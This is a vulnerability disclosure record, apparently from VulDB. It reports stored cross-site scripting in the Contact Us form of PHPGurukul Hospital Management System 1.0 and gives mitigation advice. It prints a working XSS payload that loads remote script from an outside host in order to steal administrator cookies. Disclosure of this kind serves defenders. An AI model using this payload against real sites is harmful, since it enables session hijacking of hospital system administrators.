| Title | PHPGurukul Hospital Management System 1.0 Cross site scripting |
|---|
| Description | Details:
- **Affected Component:** Contact Us Form
- **Endpoint:** `https://192.168.1.12/Hospital-Management-System-PHP/hospital/index.php#contact_us`
- **Vulnerable Input Fields:** Name, Email Address, message
- **Exploitable Payload:** `"><script src="https://js.rip/9jgolnku9i"></script>`
- **Impact:** Admin's cookies compromised upon reviewing Contact Us queries.
Recommendations:
1. Validate and sanitize user inputs.
2. Implement Content Security Policy (CSP) for XSS mitigation.
3. Promptly investigate and address this vulnerability. |
|---|
| Source | ⚠️ https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing |
|---|
| User | mallutrojan (UID 60819) |
|---|
| Submission | 01/03/2024 17:20 (2 years ago) |
|---|
| Moderation | 01/06/2024 16:43 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 249843 [PHPGurukul Hospital Management System 1.0 Contact Form index.php#contact_us Name/Email/Message cross site scripting] |
|---|
| Points | 20 |
|---|